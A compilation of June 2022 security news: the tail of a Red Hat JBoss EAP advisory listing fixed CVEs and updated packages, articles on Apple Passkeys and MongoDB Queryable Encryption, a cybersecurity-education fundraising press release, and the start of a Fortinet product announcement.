2047200 - CVE-2022-23437 xerces-j2: infinite loop when handling specially crafted XML document payloads  
2047343 - CVE-2022-21363 mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors  
2060725 - CVE-2022-0853 jboss-client: memory leakage in remote client transaction  
2060929 - CVE-2022-0866 wildfly: Wildfly management of EJB Session context returns wrong caller principal with Elytron Security enabled  
2063601 - CVE-2022-23913 artemis-commons: Apache ActiveMQ Artemis DoS  
2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr  
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2073890 - CVE-2022-1319 undertow: Double AJP response for 400 from EAP 7 results in CPING failures

6. JIRA issues fixed (https://issues.jboss.org/):

JBEAP-23120 - Tracker bug for the EAP 7.4.5 release for RHEL-7  
JBEAP-23171 - (7.4.z) Upgrade HAL from 3.3.9.Final-redhat-00001 to 3.3.12.Final-redhat-00001  
JBEAP-23194 - Upgrade hibernate-validator from 6.0.22.Final-redhat-00002 to 6.0.23-redhat-00001  
JBEAP-23241 - [GSS](7.4.z) Upgrade jberet from 1.3.9 to 1.3.9.SP1  
JBEAP-23299 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00034 to 2.16.0.redhat-00042  
JBEAP-23300 - [GSS](7.4.z) Upgrade JBoss Remoting from 5.0.23.SP1 to 5.0.24.SP1  
JBEAP-23312 - (7.4.z) Upgrade WildFly Core from 15.0.8.Final-redhat-00001 to 15.0.12.Final-redhat-00001  
JBEAP-23313 - (7.4.z) Upgrade Elytron from 1.15.11.Final-redhat-00002 to 1.15.12.Final-redhat-00001  
JBEAP-23336 - (7.4.z) Upgrade Hibernate ORM from 5.3.25.Final-redhat-00002 to 5.3.26.Final-redhat-00002  
JBEAP-23338 - [GSS](7.4.z) Upgrade Undertow from 2.2.16 to 2.2.17.SP3  
JBEAP-23339 - [GSS](7.4.z) Upgrade wildfly-http-ejb-client from 1.1.10 to 1.1.11.SP1  
JBEAP-23351 - (7.4.z) Upgrade org.apache.logging.log4j from 2.17.1.redhat-00001 to 2.17.1.redhat-00002  
JBEAP-23353 - (7.4.z) Upgrade wildfly-transaction-client from 1.1.14.Final-redhat-00001 to 1.1.15.Final-redhat-x  
JBEAP-23429 - [PM](7.4.z) JDK17 Update Tested Configurations page and make note in Update release notes  
JBEAP-23432 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP04 to 3.0.0.SP05  
JBEAP-23451 - [PST] (7.4.z) Upgrade to FasterXML Jackson to  2.12.6.redhat-00001 and Jackson Databind to 2.12.6.1.redhat-00003  
JBEAP-23531 - [GSS](7.4.z) Upgrade Undertow from 2.2.17.SP3 to 2.2.17.SP4  
JBEAP-23532 - (7.4.z) Upgrade WildFly Core from 15.0.12.Final-redhat-00001 to 15.0.13.Final-redhat-00001

7. Package List:

Red Hat JBoss EAP 7.4 for RHEL 7 Server:

Source:  
eap7-activemq-artemis-2.16.0-9.redhat_00042.1.el7eap.src.rpm  
eap7-h2database-1.4.197-2.redhat_00004.1.el7eap.src.rpm  
eap7-hal-console-3.3.12-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-hibernate-5.3.26-1.Final_redhat_00002.2.el7eap.src.rpm  
eap7-hibernate-validator-6.0.23-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-jackson-annotations-2.12.6-1.redhat_00001.1.el7eap.src.rpm  
eap7-jackson-core-2.12.6-1.redhat_00001.1.el7eap.src.rpm  
eap7-jackson-databind-2.12.6.1-1.redhat_00003.1.el7eap.src.rpm  
eap7-jackson-jaxrs-providers-2.12.6-1.redhat_00001.1.el7eap.src.rpm  
eap7-jackson-modules-base-2.12.6-1.redhat_00001.1.el7eap.src.rpm  
eap7-jackson-modules-java8-2.12.6-1.redhat_00001.1.el7eap.src.rpm  
eap7-jberet-1.3.9-1.SP1_redhat_00001.1.el7eap.src.rpm  
eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP05_redhat_00002.1.el7eap.src.rpm  
eap7-jboss-remoting-5.0.24-1.SP1_redhat_00001.1.el7eap.src.rpm  
eap7-jboss-server-migration-1.10.0-16.Final_redhat_00015.1.el7eap.src.rpm  
eap7-jboss-xnio-base-3.8.7-1.SP1_redhat_00001.1.el7eap.src.rpm  
eap7-log4j-2.17.1-2.redhat_00002.1.el7eap.src.rpm  
eap7-netty-4.1.72-4.Final_redhat_00001.1.el7eap.src.rpm  
eap7-netty-tcnative-2.0.48-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-netty-transport-native-epoll-4.1.72-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-snakeyaml-1.29.0-1.redhat_00001.2.el7eap.src.rpm  
eap7-undertow-2.2.17-2.SP4_redhat_00001.1.el7eap.src.rpm  
eap7-wildfly-7.4.5-3.GA_redhat_00001.1.el7eap.src.rpm  
eap7-wildfly-elytron-1.15.12-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-wildfly-http-client-1.1.11-1.SP1_redhat_00001.1.el7eap.src.rpm  
eap7-wildfly-transaction-client-1.1.15-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-xerces-j2-2.12.0-3.SP04_redhat_00001.1.el7eap.src.rpm

noarch:  
eap7-activemq-artemis-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-cli-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-commons-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-core-client-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-dto-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-hornetq-protocol-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-hqclient-protocol-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-jdbc-store-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-jms-client-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-jms-server-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-journal-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-ra-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-selector-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-server-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-service-extensions-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-activemq-artemis-tools-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm  
eap7-h2database-1.4.197-2.redhat_00004.1.el7eap.noarch.rpm  
eap7-hal-console-3.3.12-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-hibernate-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm  
eap7-hibernate-core-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm  
eap7-hibernate-entitymanager-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm  
eap7-hibernate-envers-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm  
eap7-hibernate-java8-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm  
eap7-hibernate-validator-6.0.23-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-hibernate-validator-cdi-6.0.23-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jackson-annotations-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-jackson-core-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-jackson-databind-2.12.6.1-1.redhat_00003.1.el7eap.noarch.rpm  
eap7-jackson-datatype-jdk8-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-jackson-datatype-jsr310-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-jackson-jaxrs-base-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-jackson-jaxrs-json-provider-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-jackson-module-jaxb-annotations-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-jackson-modules-base-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-jackson-modules-java8-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-jberet-1.3.9-1.SP1_redhat_00001.1.el7eap.noarch.rpm  
eap7-jberet-core-1.3.9-1.SP1_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP05_redhat_00002.1.el7eap.noarch.rpm  
eap7-jboss-remoting-5.0.24-1.SP1_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-server-migration-1.10.0-16.Final_redhat_00015.1.el7eap.noarch.rpm  
eap7-jboss-server-migration-cli-1.10.0-16.Final_redhat_00015.1.el7eap.noarch.rpm  
eap7-jboss-server-migration-core-1.10.0-16.Final_redhat_00015.1.el7eap.noarch.rpm  
eap7-jboss-xnio-base-3.8.7-1.SP1_redhat_00001.1.el7eap.noarch.rpm  
eap7-log4j-2.17.1-2.redhat_00002.1.el7eap.noarch.rpm  
eap7-netty-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-all-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-buffer-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-dns-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-haproxy-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-http-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-http2-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-memcache-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-mqtt-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-redis-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-smtp-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-socks-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-stomp-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-xml-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-common-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-handler-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-handler-proxy-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-resolver-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-resolver-dns-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-resolver-dns-classes-macos-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-tcnative-2.0.48-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-classes-epoll-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-classes-kqueue-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-native-unix-common-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-rxtx-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-sctp-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-udt-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-snakeyaml-1.29.0-1.redhat_00001.2.el7eap.noarch.rpm  
eap7-undertow-2.2.17-2.SP4_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-elytron-1.15.12-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-elytron-tool-1.15.12-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-http-client-common-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-http-ejb-client-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-http-naming-client-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-http-transaction-client-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-java-jdk11-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-java-jdk8-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-javadocs-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-modules-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-transaction-client-1.1.15-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-xerces-j2-2.12.0-3.SP04_redhat_00001.1.el7eap.noarch.rpm

x86_64:  
eap7-netty-transport-native-epoll-4.1.72-1.Final_redhat_00001.1.el7eap.x86_64.rpm  
eap7-netty-transport-native-epoll-debuginfo-4.1.72-1.Final_redhat_00001.1.el7eap.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2020-36518  
https://access.redhat.com/security/cve/CVE-2021-37136  
https://access.redhat.com/security/cve/CVE-2021-37137  
https://access.redhat.com/security/cve/CVE-2021-42392  
https://access.redhat.com/security/cve/CVE-2021-43797  
https://access.redhat.com/security/cve/CVE-2022-0084  
https://access.redhat.com/security/cve/CVE-2022-0853  
https://access.redhat.com/security/cve/CVE-2022-0866  
https://access.redhat.com/security/cve/CVE-2022-1319  
https://access.redhat.com/security/cve/CVE-2022-21299  
https://access.redhat.com/security/cve/CVE-2022-21363  
https://access.redhat.com/security/cve/CVE-2022-23221  
https://access.redhat.com/security/cve/CVE-2022-23437  
https://access.redhat.com/security/cve/CVE-2022-23913  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYp5qBdzjgjWX9erEAQgudg/+KIuaXQZawyOnSNF4IIR8WYnfcW8Ojsfk  
27VFNY6WCSn07IkzyDFuCLHsmUEesiJvpYssOx4CuX1YEmlF7S/KepyI6QDVC+BV  
hFAfaVE1gdrny1sqaS8k4VFE9rHODML1q2yyeUNgdtL4YGdOeduqOEn6Q6GS/rvh  
+8vCZFkFb9QKxxItc1xvxvU8kAomQun+eqr040IHuF0jAZfLI18/5vzsPqeQG+Ua  
qU4CG5FucVytEkJCnQ8Ci3QH3FCm/BPqotyhO3OAi1b5+db+fT+UqJpiuHYCsPcQ  
8DRKizi/ia6Rq5b/OTFodA8lo6U3nDIljJ7QcuADgGzX4fak+BxQNkQMfhS4/b01  
/yFU034PmQBTJpm0r5Vb4V4lBWzAi5QMDttI4wncuM3VGbxSoEEXzdzFHVzgoy1r  
qDGfJ1C5VnSJeLawDa6tGyndBiVga/PPgx0CoSIPsAYnjXYfJM1DsohUXppTL1k+  
z8W2UIoIGqycYdCm60uJ+qbzqLlODNXmXn154OJL3O/o6Nz7O+uqVt+WfaNnwO/Y  
wf85wHGjzLaOALZfly/fENQr5Aijb9WqavN3tbcipj6+F4D3OLJMOSap8+TOXF3C  
StEX/XQpQASMmemvHJr/8c9Fx6tumJ+hLI4EyXfNdlYFJFQY4l4J0X6+mH047B3G  
R+RN8v8nzXQ{m6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4918-01

Apple’s iOS 16 and macOS Ventura will introduce passwordless login for apps and websites. It’s only the beginning.

Your passwords are terrible. Year after year, the most popular passwords leaked in data breaches are 123456, 123456789, and 12345—‘qwerty’ and ‘password’ come close behind—and using these weak passwords leaves you vulnerable to all sorts of hacking. Weak and repeated passwords are one of the most significant risks to your online life.

For years, we’ve been promised a more secure, password-free future, but it seems like 2022 will _actually_ be the year that millions of people start to move away from passwords. At Apple’s Worldwide Developer Conference yesterday, the company announced it will launch passwordless logins across Macs, iPhones, iPads, and Apple TVs around September of this year. Instead of using passwords, you will be able to log in to websites and apps using “Passkeys” with iOS 16 and macOS Ventura. It’s the first major real-world shift to password elimination.

So how does it work? Passkeys replace your tired old passwords by creating new digital keys using Touch ID or Face ID, Apple’s vice president of internet technologies, Darin Adler, explained at WWDC. When you are creating an online account with a website, you can use a Passkey instead of a password. “To create a Passkey, just use Touch ID or Face ID to authenticate, and you’re done,” Adler said.

When you go to log in to that website again, Passkeys allow you to prove who you are by using your biometrics rather than typing in a passphrase (or having your password manager enter it for you). When signing in to a website on a Mac, a prompt will appear on your iPhone or iPad to verify your identity. Apple says its Passkeys will sync across your devices using iCloud’s Keychain, and the Passkeys are stored on your devices rather than on servers. (The use of iCloud Keychain should also solve the problem of losing or breaking your linked devices.) Under the hood, Apple’s Passkeys are based on the Web Authentication API (WebAuthn) and are end-to-end encrypted so nobody can read them, including Apple. The system for creating Passkeys uses public-private key authentication to prove you are who you say you are.

A passwordless system would be a significant step forward for most people’s online security. As well as eliminating guessable passwords, removing passwords reduces the likelihood of successful phishing attacks. And passwords can’t be stolen in data breaches if they don't exist in the first place. (Some apps and websites already allow people to log in using their fingerprints or using face recognition, but these usually require you to first create an account with a password.)

Apple’s Passkeys aren’t entirely new—the company first detailed them at 2021’s WWDC and started testing them shortly after—and Apple isn’t the only one that wants to eliminate passwords. The FIDO Alliance, a tech industry group, has been working on the underlying standards needed to ditch passwords for almost a decade, and Apple’s Passkeys are the company’s implementation of these standards.

In recent months, FIDO has taken a series of important steps to bring the password’s demise closer to reality. In March, FIDO announced it has figured out a way to store the cryptographic keys that sync between people’s devices, calling them “multi-device FIDO credentials” or “passkeys.”

This was followed in May by Apple, Microsoft, and Google declaring their support for the FIDO standards. Jen Easterly, the director of the US Cybersecurity and Infrastructure Security Agency, said adoption of the standards would keep more people safe online. At the time, the three tech giants said they would start rolling out the technology “over the course of the coming year.” Microsoft account owners have been able to ditch their passwords since September of last year, and Google has been working on its passwordless technology since 2008.

When all the tech companies have rolled out their version of passkeys, it should be possible for the system to work across different devices—in theory, you could use your iPhone to log in to a Windows laptop, or an Android tablet to log in to a website in Microsoft’s Edge Browser. “All of FIDO’s specs have been developed collaboratively, with inputs from hundreds of companies,” says Andrew Shikiar, the executive director of the FIDO Alliance. Shikiar confirms that Apple is the first company to start rolling out passkey-style technology and says this shows “how tangible this approach will soon be for consumers worldwide.”

Any success for a passwordless future depends on how it works in reality. At the moment, there are unanswered questions about what happens to your Passkeys if you want to ditch Apple’s ecosystem for Android or another platform. (Apple hasn’t yet responded to our request for comment.) And developers still need to implement changes to their apps and websites to work with Passkey. Plus, to gain trust in any system, people need to be educated about how it works. “Any viable solution must be safer, easier, and faster than the passwords and legacy multi-factor authentication methods used today,” ​​Alex Simons, the head of Microsoft’s identity management efforts, said in May. In short: If cross-device systems are clunky or a pain to use, people may shun them in favor of weak but convenient passwords.

While Apple’s Passkey and Google and Microsoft’s equivalents are still some months away (at the very least), that doesn’t mean you should idly keep using your weak or repeated passwords. Every password you use—whether it’s for a one-time account used to buy DIY supplies or your Facebook account—should be strong and unique. Don’t use common phrases, names of friends or pets, or personal information linked to you in your passwords.

Instead, your passwords should be long and strong. The best way to achieve this is by using a password manager, which can help you create and store better passwords. You can find our pick of the best password managers here. And while you’re thinking about your security, turn on multi-factor authentication for as many accounts as possible.

Apple Just Killed the Password—for Real This Time

A coalition of over 25 industry leaders, led by NightDragon and non-profit NextGen Cyber Talent, partner to raise $1 million for collegiate cybersecurity education

SAN FRANCISCO, June 6, 2022 /PRNewswire/ -- NightDragon, an investment and advisory firm focused on the cybersecurity, safety, security, and privacy industries, and NextGen Cyber Talent, a nonprofit organization dedicated to increasing diversity and inclusion in the cybersecurity industry through education and career opportunities for underserved and underrepresented students, today announced the launch of the Coalition to Close the Cybersecurity Talent Gap ("Coalition"), a campaign to raise $1 million to help fund one year of community college courses for Bay Area students pursuing careers in cybersecurity.

The Coalition is composed of more than 25 industry-leading cybersecurity and technology leaders that are passionate about cultivating the next generation of cybersecurity talent and committed to closing the cybersecurity skills gap. Driven to make a difference in the lives of students and their local communities, at launch, the Coalition has raised more than $300,000 of the $1 million needed to fund the cybersecurity education initiative for Bay Area students.

Through leveraging its vast network, NightDragon led the formation of the coalition including NightDragon portfolio companies, go-to-market and investment partners. Founding members for the initial cohort include: AllegisCyber Capital, Carahsoft, Claroty, Coalfire, Cyderes, Deloitte, Exclusive Networks, ForgeRock, HUMAN Security, iboss, Immuta, Ingram Micro, Interos, Knight Group, Macnica, Marsh, Merlin, Mezmo, NightDragon, Onapsis, Optiv, Palo Alto Networks, Prosek, Team8, Ten Eleven Ventures, ThriveDX, SafeGuard Cyber, Snowflake, and vArmour.

"There are an estimated 2.7 million unfilled cybersecurity positions. These vacancies create a significant challenge as security teams everywhere struggle to hire talent to monitor and remediate cyberattacks, as well as develop new technology to combat today's latest threats," said Krishnan Chellakarai, Founder and Co-Chairman of NextGen Cyber Talent and CISO of Gilead Sciences. "Solving the cybersecurity talent shortage will take a collective industry-wide effort. We are calling on the industry during the RSA Conference to contribute to the campaign and look forward to the impact we can make together to close the cybersecurity talent gap."

"The cybersecurity talent shortage is an issue that impacts all of us and is one of the biggest challenges facing our industry and national security. Let's demonstrate that as an industry we can come together to help solve for the talent shortage and foster the next generation in cyber talent that will help us combat today's threats," said Dave DeWalt, Founder, and Managing Director, NightDragon, and Board Member, NextGen Cyber Talent.

"The partners who have pulled together on this important mission are an impactful group of leaders from across the industry, which speaks to the universal nature of this mission to close the cybersecurity talent gap. By reaching out to the broader industry at the RSA Conference, we hope to show the power and compassion of our industry to help the underserved and enrich the cybersecurity workforce with more diversity," said Amy De Salvatore, VP Business Development and Strategic Alliances, NightDragon, who initiated the campaign and led the formation of the Coalition.

NextGen Cyber Talent partners with Bay Area community colleges to offer several cohorts of training programs, continuous career development and mentoring, and grants to hundreds of students pursuing cybersecurity education. The funds will be distributed by NextGen Cyber Talent to students at participating Bay Area community colleges who have applied and met the qualifying grade criteria of a B- or better. In addition to capital, founding coalition partners have also contributed additional in-kind donations, including lectures, curriculum materials, and internships for students.

"As we continue to focus on the essential mission of making each day safer than the one before, we have a responsibility as an industry to encourage and educate the next generation of cyber leaders," said BJ Jenkins, President at Palo Alto Networks and NightDragon Board member. "We thank NightDragon and NextGen Cyber Talent for bringing us together on this shared vision. We look forward to helping students recognize all of the cybersecurity career possibilities."

Donations of any size can be made through the Coalition to Close the Cybersecurity Talent Gap campaign donations page.

**About NextGen Cyber Talent**

NextGen Cyber Talent is a non-profit providing a platform to increase diversity and inclusion in the cybersecurity industry. It brings together cybersecurity experts, solution providers and enterprises to make a difference in the underserved and underprivileged community and address a mounting cyber skills shortage and talent gap. To learn more, visit www.NextGencybertalent.com.

**About NightDragon**

NightDragon is an investment and advisory firm focused on growth and late-stage investments within the cybersecurity, safety, security and privacy industries. Its platform and vast industry network provide unparalleled threat insights, deal flow, market leverage and operating expertise to drive portfolio company growth and increase shareholder value. Founded by Dave DeWalt, the NightDragon team has more than 25 years of operational and market expertise leading technology companies such as Documentum, EMC, Siebel Systems (Oracle), McAfee, Mandiant, Avast and FireEye. Read more about NightDragon at www.nightdragon.com.

Cybersecurity Industry Leaders Launch Campaign to Close the Cybersecurity Talent Gap

MongoDB claims its new “Queryable Encryption” lets users search their databases while sensitive data stays encrypted. Oh, and its cryptography is open source.

After years of data breaches, leaks, and hacks leaving the world desperate for tools to stem the illicit flow of sensitive personal data, a key advance has appeared on the horizon.

On Tuesday, MongoDB is announcing “Queryable Encryption,” a feature that will allow database users to search their data while it remains encrypted. The tool, which is debuting in preview as part of MongoDB 6.0, attempts to bridge academic cryptography findings and real-world environments so users can adopt the feature without needing advanced theoretical expertise. Crucially, Queryable Encryption is built to work with existing databases rather than requiring users to re-architect their systems before they can take advantage of it.

Institutions from businesses to governments, health care facilities, and critical infrastructure already lean on encryption to render data unintelligible (and therefore not worth stealing) when it's traveling across networks or sitting in storage. But none of that protects data when it's actively being used for legitimate reasons—looking up a patient's medical records, say, or setting up a car rental reservation. That means an attacker—including a rogue employee—could potentially gain access to data the same way a doctor or customer service agent does. This is a nut everyone wants to crack, and the database maker MongoDB has been working on possible solutions for years. Now, the company says, it has one.

“This is exactly the kind of thing that customers are wanting. We work with the biggest banks, pension systems, treasury exchanges, payment networks, pizza chains—and everyone wants better assurances,” says Kenn White, MongoDB's security principal. “And because of some practical engineering breakthroughs, it went from an academic kind of thing to something that actually could work on big databases.”

Queryable Encryption could let a bank agent investigate your account for possible fraud on a range of dates without knowing which dates specifically flagged the system. Or it could allow a customer service rep to type the first few letters of a name and start a claims process while leaving the name encrypted and indecipherable. 

Many of these breakthroughs came from Brown University cryptographer Seny Kamara and his longtime collaborator Tarik Moataz. Several years ago, the pair cofounded a searchable encrypted database startup known as Aroki Systems along with entrepreneur John Partridge. Aroki collaborated with MongoDB on a database security feature, announced in 2019, and Kamara and Moataz continued working on a prototype of a truly searchable encrypted database. In 2021, MongoDB acquired Aroki.

The Queryable Encryption system is built with a combination of established cryptographic protocols and conceptual advances Kamara and Moataz have been working on for years in an area of cryptography known as structured encryption. The approach involves encrypting data with a specific architecture so it can be searched with special tokens specific to each query without data ever being decrypted. Other techniques such as homomorphic encryption allow users to do computations on encrypted data, like adding two columns in an encrypted spreadsheet. But structured encryption is specifically focused on organizing encrypted data so it can be found without exposing the data itself.

“What we focus on is not how to do arithmetic operations on encrypted data, but how to find information fast—like really, really fast,” says Kamara, who is currently on leave from his associate professor role at Brown.

Speed is a challenge in encrypted operations, where every extra key check and computation add complications to basic operations. But MongoDB claims that searches performed with Queryable Encryption are impressively fast and won't cause unreasonable performance losses—a claim that customers will be able to test for themselves with the new preview. MongoDB is also open-sourcing much of the Queryable Encryption system, so users and other researchers can vet its underlying cryptography.

“A lot of the work is very theoretical in nature, algorithms, crypto security definitions, but for me at the end of the day I want to see something come out of it,” Kamara says. “There is a social imperative behind the work that scientists do. Working with a company at the scale of Mongo, this will be available to a huge number of people, a huge number of work loads.”

Moataz and Kamara say the big breakthrough that allowed them to move their concept from the academic world toward the real world was emulation, which enabled them to use the properties of structured encryption with existing databases that have different architectures. Like emulating Super Nintendo games on your PC or emulating Windows on a Mac, the approach creates a liminal space in which structured encryption can run on top of traditional databases.

Still, Kamara and Moataz emphasize that it's been a challenge and a learning process to collaborate with MongoDB engineers and turn the Aroki Systems prototype into something that can actually be deployed at scale around the world.

“Seny and I have been learning a lot about the constraints of real-world deployments that academics know nothing about,” Moataz says. “Models in academia are less restrictive. So we are enjoying being exposed to that and improving our models and our designs with respect to these constraints.”

Though Tuesday's release will be the first time that the public can vet Queryable Encryption in the wild, Aroki Systems had cryptographer JP Aumasson conduct technical due diligence on the cryptographic underpinning of their prototype system. And MongoDB invited University of Chicago cryptographer and searchable encryption researcher David Cash to take an early look as well. Both told WIRED that while they haven't audited the entire system deployment, the underlying cryptography appears sound. And they both emphasize that it's exciting to see a real-world searchable encryption scheme take shape after so long.

“A lot of crypto research since the 1980s has sort of been centered on how do we do this stuff, so this is a long time coming," Cash says. “Everything in cryptography is about trade-offs, and the world is complicated, so it's important to be careful about absolute statements, but that this vision is realized in some form is very exciting. And this is not at all snake oil or security theater. They're going deep on this and thinking about the important stuff carefully.”

Aumasson says that many others have claimed to offer searchable encryption without the technical depth or capability. “There have been other products advertising encrypted search, but academics would really laugh at those,” he says. “What Mongo is doing is something that is academic-compliant, and I’m very happy to see it.”

A Long-Awaited Defense Against Data Leaks May Have Just Arrived

FortiRecon combines machine learning, automation, and human intelligence to continually monitor an organization’s external attack surface.

**SAN FRANCISCO, Calif., – RSAC 2022 - Jun 6, 2022**

**John Maddison, EVP of Products and CMO at Fortinet**

“The sooner in the attack cycle you identify and stop an adversary, the less costly and damaging their actions. Employing a powerful combination of human and artificial intelligence, FortiRecon provides organizations with a view of what adversaries are seeing, doing and planning. FortiRecon’s vendor agnostic SaaS delivery model combined with an intuitive interface and easily digestible reports enable executives across the organization to quickly understand the risks posed to their company, data, and brand reputation, while our team of FortiGuard Labs cybersecurity experts enhance the offering with takedown services, guidance on prioritization of remediation efforts, and targeted threat research and intelligence.”

**News Summary**

